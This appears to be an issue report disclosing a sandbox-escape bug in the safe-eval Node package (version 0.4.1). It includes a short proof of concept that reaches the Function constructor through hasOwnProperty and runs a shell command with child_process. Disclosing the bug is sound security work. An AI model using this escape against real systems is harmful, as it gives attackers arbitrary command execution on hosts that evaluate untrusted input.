Open
Description
// node version: 19.8.1
// safe-eval version: 0.4.1
var safeEval = require('safe-eval')
let code = `
(function () {
let ret = hasOwnProperty;
ret.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}());
`
safeEval(code);We found a sandbox escaping bug. This bug can be triggered by using hasOwnProperty function.
Also, we can execute arbitrary shell code using the process module.
Metadata
Metadata
Assignees
Labels
No labels